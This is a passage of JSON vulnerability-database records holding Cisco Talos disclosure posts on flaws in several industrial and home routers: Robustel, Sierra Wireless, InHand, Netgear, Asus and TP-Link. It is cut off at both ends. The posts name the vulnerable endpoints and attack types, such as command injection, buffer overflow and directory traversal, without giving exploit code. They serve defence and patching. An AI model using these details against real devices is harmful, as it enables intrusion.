false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28127", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271"], "modified": "2022-10-12T19:33:00", "id": "TALOSBLOG:5249F941D38D1066B30BDEFF9C2C9F1B", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-multiple-issues-in-robustel-r1510-cellular-router-could-lead-to-code-execution-denial-of-service/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-12T20:01:15", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyPfGpaBqJBtGR3LhNL0IWlzLJMrDR3I_SNfxlKJzGOmo3XHPqpq3BHAxkbt_d5avK55IeBjUlfR4ogw8AFRcV22u6hQoM_UjtBhEsxmuap4Z2cxrkqHCImDMGA5yHSveYummdAAQg32QvBFuefH3JI8dwjZs999F4-IjhaKcixiu59VzwravZ3hsb/s1001/vuln%20spotlight.jpg>)\n\n \n_ \n_\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. _\n\nCisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely. \n\nThe Robustel R1510 router is a dual-ethernet port wireless router that shares 3G and 4G wireless signals for use in industrial and internet-of-things environments. The router includes the use of open VPN tunneling, a cloud management platform to manage other devices and routers and different safeguards to manage data caps. \n\nTalos discovered five operating system command injection vulnerabilities in the router that an adversary could trigger by sending the targeted device a specially crafted network request. All these vulnerabilities have a CVSS severity score of 9.1 out of 10: \n\n * [TALOS-2022-1578](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1578>) (CVE-2022-34850) \n * [TALOS-2022-1577](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1577>) (CVE-2022-33150) \n * [TALOS-2022-1576](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1576>) (CVE-2022-32765) \n * [TALOS-2022-1573](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1573>) (CVE-2022-33325 - CVE-2022-33329) \n * [TALOS-2022-1572](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1572>) (CVE-2022-33312 - CVE-2022-33314) \n\n[TALOS-2022-1580](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1580>) (CVE-2022-34845) and [TALOS-2022-1570](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1570>) (CVE-2022-32585) can also lead to arbitrary code execution, though this vulnerability exists when a user logs in as an administrator. \n\nAn attacker could also send a specially crafted network request to trigger [TALOS-2022-1575](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1575>) (CVE-2022-35261 - CVE-2022-35271), a denial-of-service vulnerability in the device\u2019s web server hashFirst functionality that could allow an adversary to crash the web server. \n\nAnother vulnerability, [TALOS-2022-1571](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1571>) (CVE-2022-28127) also exists in the web server on the device, but instead could be exploited to remove arbitrary files, even though a path traversal check is in place. \n\nCisco Talos worked with Robustel to ensure that these issues are resolved and an update is available for affected customers, all in adherence to [Cisco\u2019s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>). \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgECbFVaFCGsRj0QepDc7ZcfjMmCye-xB5lxsjSBEicQ-0zIW0RCwCEDx45HMOq9lHDHfE8rLp7oWur_jPL76QbCJaLcv7yI3cH0KRyfBqd9kgk1RTqDtDluD_RJ9MkMKD6cNPD_D_t8pcfYegC8oAUjTSTSnsHqHZ8qiWk-0KAgfm_ANAZ_Kby-8-/s1100/patch_availability_available.jpg>)\n\nUsers are encouraged to update these affected products as soon as possible: Robustel R1510, version 3.3.0 and 3.1.16. Talos tested and confirmed these versions of the router could be exploited by these vulnerabilities. \n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60007 - 60035, 60388-60391, 60393 and 60455. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T19:33:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple issues in Robustel R1510 cellular router could lead to code execution, denial of service", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28127", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271"], "modified": "2022-10-12T19:33:07", "id": "TALOSBLOG:29DAF5785414A83AEFB51D866CCCA165", "href": "http://blog.talosintelligence.com/2022/10/vuln-spotlight-robustel-router.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-09T10:20:19", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073"], "description": "[](<http://3.bp.blogspot.com/-u4VNRqt9gWo/XL84c4naXMI/AAAAAAAAF8w/ZtailwySzYw-wVrCpn7vF8lYahprRYfQwCK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg>)_ \n_ \n_Carl Hurd and Jared Rittle of Cisco Talos discovered these vulnerabilities._ \n\n\n### Executive summary\n\nSeveral exploitable vulnerabilities exist in the Sierra Wireless AirLink ES450, an LTE gateway designed for distributed enterprise, such as retail point-of-sale or industrial control systems. These flaws present a number of attack vectors for a malicious actor, and could allow them to remotely execute code on the victim machine, change the administrator\u2019s password and expose user credentials, among other scenarios. The majority of these vulnerabilities exist in ACEManager, the web server included with the ES450. ACEManager is responsible for the majority of interactions on the device, including device reconfiguration, user authentication and certificate management. \n \nIn accordance with our coordinated disclosure policy, Cisco Talos worked with Sierra Wireless to ensure that these issues are resolved and that an update is available for affected customers. \n \n\n\n### Vulnerability details\n\n**Sierra Wireless AirLink ES450 ACEManager iplogging.cgi command injection vulnerability (TALOS-2018-0746/CVE-2018-4061)** \n \nAn exploitable command injection vulnerability exists in the ACEManager iplogging.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can inject arbitrary commands, resulting in arbitrary command execution. An attacker can send an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0746>). \n \n**Sierra Wireless AirLink ES450 SNMPD hard-coded credentials vulnerability (TALOS-2018-0747/CVE-2018-4062)** \n \nA hard-coded credentials vulnerability exists in the SNMPD function of the Sierra Wireless AirLink ES450 FW 4.9.3. Activating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user. An attacker can activate SNMPD without any configuration changes to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0747>). \n \n**Sierra Wireless AirLink ES450 ACEManager upload.cgi remote code execution vulnerability (TALOS-2018-0748/CVE-2018-4063)** \n \nAn exploitable remote code execution vulnerability exists in the upload.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the web server. An attacker can make an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0748>). \n** \n****Sierra Wireless AirLink ES450 ACEManager upload.cgi unverified password change vulnerability (TALOS-2018-0749/CVE-2018-4064)** \n \nAn exploitable unverified password change vulnerability exists in the ACEManager upload.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an unverified device configuration change, resulting in an unverified change of the `user` password on the device. An attacker can make an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0749>). \n \n**Sierra Wireless AirLink ES450 ACEManager ping_result.cgi cross-site scripting vulnerability (TALOS-2018-0750/CVE-2018-4065)** \n \nAn exploitable cross-site scripting vulnerability exists in the ACEManager ping_result.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP ping request can cause reflected JavaScript to be executed and run on the victim's browser. An attacker can exploit this by convincing a victim to click a link or embedded URL that redirects to the reflected cross-site scripting vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0750>). \n \n**Sierra Wireless AirLink ES450 ACEManager cross-site request forgery vulnerability (TALOS-2018-0751/CVE-2018-4066)** \n \nAn exploitable cross-site request forgery vulnerability exists in the ACEManager function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an authenticated user to perform privileged requests unknowingly, resulting in unauthenticated requests being requested through an authenticated user. Triggering this vulnerability may allow an attacker to get authenticated pages via an authenticated user. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0751>). \n \n**Sierra Wireless AirLink ES450 ACEManager template_load.cgi information disclosure vulnerability (TALOS-2018-0752/CVE-2018-4067)** \n \nAn exploitable information disclosure vulnerability exists in the ACEManager template_load.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information leak, resulting in the disclosure of internal paths and files. An attacker can make an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0752>). \n \n**Sierra Wireless AirLink ES450 ACEManager information disclosure vulnerability (TALOS-2018-0753/CVE-2018-4068)** \n \nAn exploitable information disclosure vulnerability exists in the ACEManager function of Sierra Wireless AirLink ES450 FW 4.9.3. An HTTP request can result in the disclosure of the default configuration for the device. An attacker can send an unauthenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0753>). \n \n**Sierra Wireless AirLink ES450 ACEManager information exposure vulnerability (TALOS-2018-0754/CVE-2018-4069)** \n \nAn information disclosure vulnerability exists in the ACEManager authentication functionality of Sierra Wireless AirLink ES450 FW 4.9.3. The ACEManager authentication functionality is done in plaintext XML to the web server. An attacker can listen to network traffic upstream from the device to capitalize on this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0754>). \n \n**Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi information disclosure vulnerability (TALOS-2018-0755/CVE-2018-4070, CVE-2018-4071)** \n \nAn exploitable information disclosure vulnerability exists in the ACEManager Embedded_Ace_Get_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause information disclosure, resulting in the exposure of confidential information, including, but not limited to, plain text passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0755>). \n \n**Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi permission assignment vulnerability (TALOS-2018-0756/CVE-2018-4072, CVE-2018-4073)** \n \nAn exploitable permission assignment vulnerability exists in the ACEManager Embedded_Ace_Set_Task.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an arbitrary setting to write, resulting in the unverified changes to any system setting. An attacker can make an authenticated HTTP request, or run the binary as any user, to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0756>). \n \n\n\n### Versions tested\n\nTalos tested and confirmed that that the Sierra Wireless AirLink ES450 FW 4.9.3 is affected by these vulnerabilities. \n\n\n### Devices affected\n\nSierra Wireless has confirmed that multiple devices are affected by various subsets of these vulnerabilities including: \n\n\n * GX400\n * ES/GX440\n * LS300\n * ES/GX450\n * MP70\n * RV50/50X\n * LX40/60X\n \nMore thorough information about untested devices can be found through the [Sierra Wireless advisories](<https://www.sierrawireless.com/company/security/>). \n \n \n[](<http://3.bp.blogspot.com/-g1YisRwdl5s/XL84m5262eI/AAAAAAAAF84/im_ds83pxxYdteufavVjq8pY2zbkjNqKQCK4BGAYYCw/s1600/patch_availability_available.jpg>) \n\n\n### \n\n### \n\n### Coverage\n\nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rules: [48600](<https://snort.org/advisories/666>), [48635, 48614 - 48621](<https://snort.org/advisories/667>), [48747](<https://snort.org/advisories/671>) \n\n\n \n\n\n", "modified": "2019-04-25T11:06:20", "published": "2019-04-25T11:06:20", "id": "TALOSBLOG:D359C8798DB4F71E8813CE20072A5C76", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/8-yvP7K6d3Y/vulnerability-sierra-airlink.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple vulnerabilities in Sierra Wireless AirLink ES450", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-11-16T08:07:12", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in InHand Networks&#x27; InRouter302 that could allow an attacker to access the router&#x27;s console and make changes to the router&#x27;s settings, including security protocols. \n\nThe InRouter is an industrial LTE router that includes remote management functionalities and several security protection mechanisms, such as VPN connections and a firewall.\n\nThis is just the latest set of vulnerabilities Talos has discovered in the InRouter302. [We previously outlined](<https://blog.talosintelligence.com/2022/05/blog-post-.html>) how an attacker could string together several other since-patched security issues to gain root access to the device.\n\n[TALOS-2022-1523](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1523>) (CVE-2022-25932) is actually an updated vulnerability for a new patch, as the previous security update to cover [TALOS-2022-1472](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1472>) and [TALOS-2022-1474](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1474>) was not effective.\n\nAdditionally, the router&#x27;s firmware contains leftover code in the debug feature. The InRouter302 offers telnet and SSHD services. When provided with the correct credentials, both will allow access to the router&#x27;s console. From the console, an attacker could manipulate several crucial security settings, including providing a specific command to manipulate the firmware signature verification flag and upload malicious firmware to the device.\n\nThese vulnerabilities are:\n\n * [TALOS-2022-1518](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1518>) (CVE-2022-29481)\n * [TALOS-2022-1519](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1519>) (CVE-2022-30543)\n * [TALOS-2022-1520](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1520>) (CVE-2022-26023)\n * [TALOS-2022-1521](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1566>) (CVE-2022-28689)\n\n[TALOS-2022-1522](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1522>) (CVE-2022-29888) could be exploited if an attacker sends the device a specially crafted HTTP request. If exploited correctly, the adversary could gain the ability to delete arbitrary files on the device, potentially disrupting its operations or settings.\n\nCisco Talos worked with InHand Networks to ensure that these issues are resolved and an update is available for affected customers, all in adherence to [Cisco&#x27;s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\n\n\nUsers are encouraged to update these affected products as soon as possible: InHand Networks InRouter302, version 3.5.45. Talos tested and confirmed these versions of the router could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 59152, 59153, 59882 - 59884 and 59886. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-27T15:04:42", "type": "talosblog", "title": "Vulnerability Spotlight: Vulnerabilities in InHand router could give attackers access to console, delete files", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-25932", "CVE-2022-26023", "CVE-2022-28689", "CVE-2022-29481", "CVE-2022-29888", "CVE-2022-30543"], "modified": "2022-10-27T15:04:42", "id": "TALOSBLOG:6C4E58699BB90DB08778A81DD308563F", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-inhand-router-302-oct-2022/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-04T15:37:47", "description": "\n\n_Christopher McBee and Dave McDaniel of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network&#x27;s range.\n\nA mesh system allows users to set up multiple access points to the Wi-Fi in their homes using various access points. Netgear&#x27;s Orbi system connects to the user&#x27;s modem or gateway and uses &quot;satellites&quot; to extend the Wi-Fi signal to different places throughout the home.\n\nTalos discovered a vulnerability in the Orbi Satellite -- [TALOS-2022-1596](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1596>) (CVE-2022-37337) -- that could lead to arbitrary command execution on the device. The user needs to authenticate into the mesh system first, meaning they&#x27;d need to access an unprotected network or the login credentials of a password-protected network, for this attack to be successful. Then, the adversary needs to send a specially crafted HTTP request to trigger the vulnerability.\n\nTwo other issues, [TALOS-2022-1595](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1595>) (CVE-2022-38452) and [TALOS-2022-1597](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1597>) (CVE-2022-36429), exist in the main Orbi router that could also lead to arbitrary command execution if the adversary sends a specially crafted network request or JSON object, respectively.\n\n[TALOS-2022-1598](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1598>) (CVE-2022-38458) also exists in the router. In this case, though, an adversary can carry out a man-in-the-middle attack to trick the service&#x27;s Web Services Management tool into disclosing sensitive information.\n\nCisco Talos worked with Netgear to ensure that TALOS-2022-1596, TALOS-2022-1597 and TALOS-2022-1598 are resolved and an update is available for affected customers. However, the company is still developing a patch for TALOS-2022-1595, though we are disclosing this vulnerability according to our 90-day timeline outlined in [Cisco&#x27;s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Netgear Orbi Satellite RBS750, version 4.6.8.5. Talos tested and confirmed these versions of the Orbi system could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60474 - 60477 and 60499. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T17:50:53", "type": "talosblog", "title": "Vulnerability Spotlight: Netgear Orbi router vulnerable to arbitrary command execution", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36429", "CVE-2022-37337", "CVE-2022-38452", "CVE-2022-38458"], "modified": "2023-03-21T17:50:53", "id": "TALOSBLOG:D8BE2B71060558D1F88AC6B123A6160E", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-netgear-orbi-router-vulnerable-to-arbitrary-command-execution/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-14T08:11:11", "description": "\n\n_Lilith &gt;_&gt; of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered three vulnerabilities in Asus router software.\n\nThe Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like other routers, it is configurable via an HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in more of an IOT style.\n\nTalos has identified [TALOS-2022-1586](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1586>) (CVE-2022-35401), an authentication bypass vulnerability that can lead to full administrative privileges. An attacker would need to send a series of HTTP requests to exploit this vulnerability.\n\n[TALOS-2022-1590](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1590>) (CVE-2022-38105) is an information disclosure vulnerability in the opcode of the router&#x27;s configuration service that can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.\n\n[TALOS-2022-1592](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1592>) (CVE-2022-38393) is a denial of service vulnerability, also in the opcode of the configuration service. A specially crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.\n\nCisco Talos worked with [Asus](<https://www.asus.com/us/networking-iot-servers/wifi-routers/asus-gaming-routers/rt-ax82u/>) to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco&#x27;s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update this affected product as soon as possible: Asus RT-AX82U 3.0.0.4.386_49674-ge182230. Talos tested and confirmed this version of Asus could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against these vulnerabilities: 60394 and 60473. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-10T16:20:21", "type": "talosblog", "title": "Vulnerability Spotlight: Asus router access, information disclosure, denial of service vulnerabilities discovered", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-35401", "CVE-2022-38105", "CVE-2022-38393"], "modified": "2023-01-10T16:20:21", "id": "TALOSBLOG:85B7EC75A8466C2794CC85DD62E3FDA3", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-asus-router-access-information-disclosure-denial-of-service-vulnerabilities-discovered/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-28T10:23:46", "description": "__ \n\n\n[](<https://4.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/f82RweNOqB8M4Nm-MFusv6czQrmRCygvACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg>)\n\n_ \n__Vulnerabilities discovered by Carl Hurd and Jared Rittle of Cisco Talos._ \n \nCisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution. \n \n\n\n## Overview\n\n \nThere are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20. However, these can only be exploited with an authenticated session. The remote code execution is done under the context of HTTPD However, since the HTTPD process is running under root, an attacker can run code with elevated privileges. \n \nAll vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS 2018-0620, which was found only on HWv3 FRNv1.3.0. \n \n\n\n### TALOS-2018-0617 \u2014 TP-Link TL-R600VPN HTTP denial of service\n\n \nAn exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated. \n \nCVE: CVE-2018-3948 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617>). \n \n\n\n### TALOS-2018-0618 \u2014 TP-Link TL-R600VPN HTTP server information disclosure\n\n \nAn exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system. \n \nCVE: CVE-2018-3949 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618>). \n \n\n\n### TALOS-2018-0619 \u2014 TP-Link TL-R600VPN HTTP server ping address remote code execution\n\n \nAn exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability. \n \nCVE: CVE-2018-3950 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619>). \n \n\n\n### TALOS-2018-0620 \u2014 TP-Link TL-R600VPN HTTP server fs directory remote code execution\n\n \nAn exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability. \n \nCVE: CVE-2018-3951 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620>). \n \n\n\n## Discussion\n\n \nOver the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest example that these pieces of equipment are not only vulnerable, they also lack the generic operating systems protections that mitigate vulnerabilities like buffer overflows. Fortunately in the case of TL-R600VPN routers, the critical vulnerabilities that lead remote code execution need authentication. However, the code could be executed with root privileges. \n \n[](<http://3.bp.blogspot.com/-dOUdAKn0kko/W_LMi0_j5uI/AAAAAAAAEpk/hvKaeSGCOnA4CAwr9SdyT5cDlnhtpuqKACK4BGAYYCw/s1600/patch_availability_available.jpg>) \n\n\n## Coverage\n\n \nThe following Snort IDs have been released to detect these vulnerabilities: \n \n\n\n * [47039-47040](<https://snort.org/advisories/577>)\n * [47037](<https://snort.org/advisories/577>)\n * [47062](<https://snort.org/advisories/577>)\n\n", "cvss3": {}, "published": "2018-11-19T06:30:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-3948", "CVE-2018-3949", "CVE-2018-3950", "CVE-2018-3951"], "modified": "2018-12-13T19:21:57", "id": "TALOSBLOG:F88EBAD7133FBE1A890AF58350AF7356", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/Fl3lfhKMbXM/tplinkr600.html", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2022-07-29T16:16:05", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNnc_WyzIll9pkp1ejQtwbwjsesRh6ABVsdizOaKhGsGesVxL20yfZrO-MtoCWdUaqGMJQdyfmFq41aQgLQGCYgQiXL1eI0Nz8DPnSdEtYMP_M2Ydmwc4qMU7jsle7kYkqFKERD-mO9pJkv9G6I83siJKzCF8qO4AhD5huSDz0E23rCy_W0B7eV4Qv/s1001/vuln%20spotlight.jpg>)\n\n \n_ \n_\n\n_By Francesco Benvenuto. _\n\nRecently, I was performing some research on a wireless router and noticed the following piece of code: \n\n\n\nThis unescape function will revert the URL encoded bytes 